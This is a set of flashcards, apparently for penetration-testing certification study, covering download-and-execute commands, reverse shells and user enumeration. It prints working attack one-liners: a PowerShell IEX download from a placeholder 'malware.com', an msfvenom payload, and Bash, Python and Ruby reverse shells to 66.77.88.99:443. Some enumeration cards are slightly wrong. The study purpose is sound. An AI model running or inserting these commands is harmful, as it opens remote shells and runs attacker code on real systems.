5.2 Tools & code analysis: Exploits and Automation Flashcards

1
Q

Exploits to Download Files: using PowerShell, what is the command to download and run a script?

A

powershell.exe -c "IEX((New-Object System.Net.WebClient).DownloadString('https://malware.com/badstuff.ps1'))"

2
Q

Exploits to Download Files: using PowerShell, what is the command to download a file?

A

powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('https://malware.com/badstuff.zip', 'C:\Windows\Temp\downloaded.zip')"

3
Q

Exploits to Download Files: using Python, what is the code to download a file?

A

import requests

url = 'https://malware.com/badstuff.zip'
r = requests.get(url, allow_redirects=True)
# write the response body to disk in binary mode
with open('downloaded.zip', 'wb') as f:
    f.write(r.content)

4
Q

Exploits for Remote Access: explain how to generate a PowerShell reverse shell using Metasploit

A

msfvenom -p cmd/windows/reverse_powershell lhost=66.77.88.99 lport=443 > script.ps1

msfvenom: This is the command-line utility within the Metasploit Framework used for generating payloads.

-p cmd/windows/reverse_powershell: This specifies the payload to be generated. In this case, it’s a reverse PowerShell shell payload for Windows. A reverse shell is a type of shell where the target machine initiates the connection back to the attacker’s machine, allowing the attacker to gain control over the target.

lhost=66.77.88.99: This sets the IP address of the listener (the attacker’s machine) to 66.77.88.99. This is the IP address to which the target machine will connect when the reverse shell payload is executed.

lport=443: This sets the port number for the listener to 443. This is the port on the attacker’s machine where the reverse shell connection will be established.

> script.ps1: This redirects the output of the msfvenom command to a file named "script.ps1". The generated PowerShell reverse shell payload will be saved in this file.

5
Q

Exploits for Remote Access: explain how to generate a reverse shell using Bash (Linux Reverse Shell)

A

bash -i >& /dev/tcp/66.77.88.99/443 0>&1

  • "bash -i": This starts an interactive Bash shell.
  • ">& /dev/tcp/66.77.88.99/443": This redirects both standard output and standard error to the specified network address and port. In this case, it's sending the output to IP address 66.77.88.99 on port 443.
  • "0>&1": This redirects the standard input to the standard output, effectively sending the input from the network connection back to the output.
6
Q

Exploits for Remote Access: explain how to generate a reverse shell using Python (Linux Reverse Shell)

A

export RHOST="66.77.88.99";
export RPORT=443;
python -c 'import socket,os,pty; s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'

1/ export RHOST="66.77.88.99"; export RPORT=443;: These two commands set environment variables RHOST and RPORT to the specified IP address and port number. These variables will be used later in the Python command.

2/ python -c 'import socket,os,pty; s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")': This Python one-liner does the following:
- Imports the necessary modules: socket, os, and pty.
- Creates a new socket 's'.
- Connects the socket to the IP address and port specified by the environment variables RHOST and RPORT.
- Duplicates the file descriptors (0 for stdin, 1 for stdout, and 2 for stderr) to the socket using os.dup2.
- Spawns a shell (/bin/sh) using pty.spawn.

7
Q

Exploits for Remote Access: explain how to generate a reverse shell using Ruby (Linux Reverse Shell and Windows Reverse Shell)

A

o Ruby (Linux Reverse Shell):
ruby -rsocket -e 'f=TCPSocket.open("66.77.88.99",443).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

o Ruby (Windows Reverse Shell):
ruby -rsocket -e 'c=TCPSocket.new("66.77.88.99","443"); while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

8
Q

Exploits for Enumerating Users: explain how to list all users in a domain using PowerShell

A

Import-Module ActiveDirectory;
Get-ADUser -Identity <username> -Properties *

9
Q

Exploits for Enumerating Users: explain how to list all users in a group using PowerShell

A

Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | select Administrator

10
Q

Exploits for Enumerating Users: explain how to list all users on a system using Bash (2)

A

cat /etc/passwd

awk -F':' '{ print $1 }' /etc/passwd

11
Q

Exploits for Enumerating Users: explain how to list all logged users using Bash

A

who | awk '{print $1}' | sort | uniq | tr '\n' ' '
